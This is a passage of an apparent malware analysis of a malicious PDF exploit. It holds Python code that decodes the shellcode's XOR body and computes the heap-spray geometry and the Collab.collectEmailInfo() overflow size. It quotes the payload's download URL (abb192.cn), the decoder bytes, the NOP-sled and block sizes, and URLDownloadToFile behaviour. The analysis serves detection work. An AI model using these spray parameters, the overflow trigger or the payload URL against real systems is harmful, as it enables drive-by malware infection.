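    """Apply the shellcode's own decoder loop. Prologue (my disassembly):
         EB 0F jmp +0x0F | 5B pop ebx | 33 C9 xor ecx,ecx | 66 B9 80 01 mov cx,0x180
         80 33 EF xor byte [ebx],0xEF | 43 inc ebx | E2 FA loop | EB 05 jmp +5
         E8 EC FF FF FF call -0x14    ; its return address = start of the encoded body
    Length and key are read from the instruction bytes, not hardcoded."""
    count = struct.unpack_from("<H", sc, sc.index(b"\x66\xb9") + 2)[0]
    key = sc[sc.index(b"\x80\x33") + 2]
    start = sc.index(b"\xe8\xec\xff\xff\xff") + 5
    return bytes(b ^ key for b in sc[start:start + count])


DECODED_BODY = decode_xor_body(SHELLCODE)


def spray_geometry(shellcode_len: int, target: int = 0x0C0C0C0C,
                   block: int = 0x400000, slack: int = 0x38) -> dict:
    """Sizes dBDXF7AJdGYcHV() derives from its constants."""
    sled_bytes = block - (shellcode_len + slack)      # Ftm1cFyetS2t
    blocks = math.ceil((target - block) / block)      # loop bound yZrM0
    return {"sled_bytes": sled_bytes,
            "chunk_bytes": sled_bytes + shellcode_len,  # one JS string; plus slack = block
            "blocks": blocks,
            "sprayed_bytes": blocks * block}


def overflow_msg_units(seed_units: int = 2, minimum: int = 44952) -> int:
    """UTF-16 length of the msg given to Collab.collectEmailInfo(): the
    two-unit "%u0c0c%u0c0c" seed is doubled until it reaches minimum."""
    n = seed_units
    while n < minimum:
        n *= 2
    return n


if __name__ == "__main__":
    print(find_urls(SHELLCODE), DECODED_BODY[:8].hex(), DECODED_BODY[-7:])
    print(spray_geometry(len(SHELLCODE)), overflow_msg_units())
```

Two facts fall out that the rule descriptions only hint at: the URL http://abb192.cn/spl3/load.php?id=8761&spl=4 sits after the 384-byte XOR-encoded body in the clear, which is what makes it greppable without executing anything, and the decoded body opens with a PEB walk (mov eax, fs:[0x30]) and ends with the string URLMON, matching the urlmon/URLDownloadToFile behaviour the rule describes. The geometry is 48 chunks of exactly 0x400000 bytes, each 0x3FFE00 bytes of 0x90 sled in front of 456 bytes of shellcode, and a 65,536-code-unit msg (128 KiB of 0x0c) handed to Collab.collectEmailInfo().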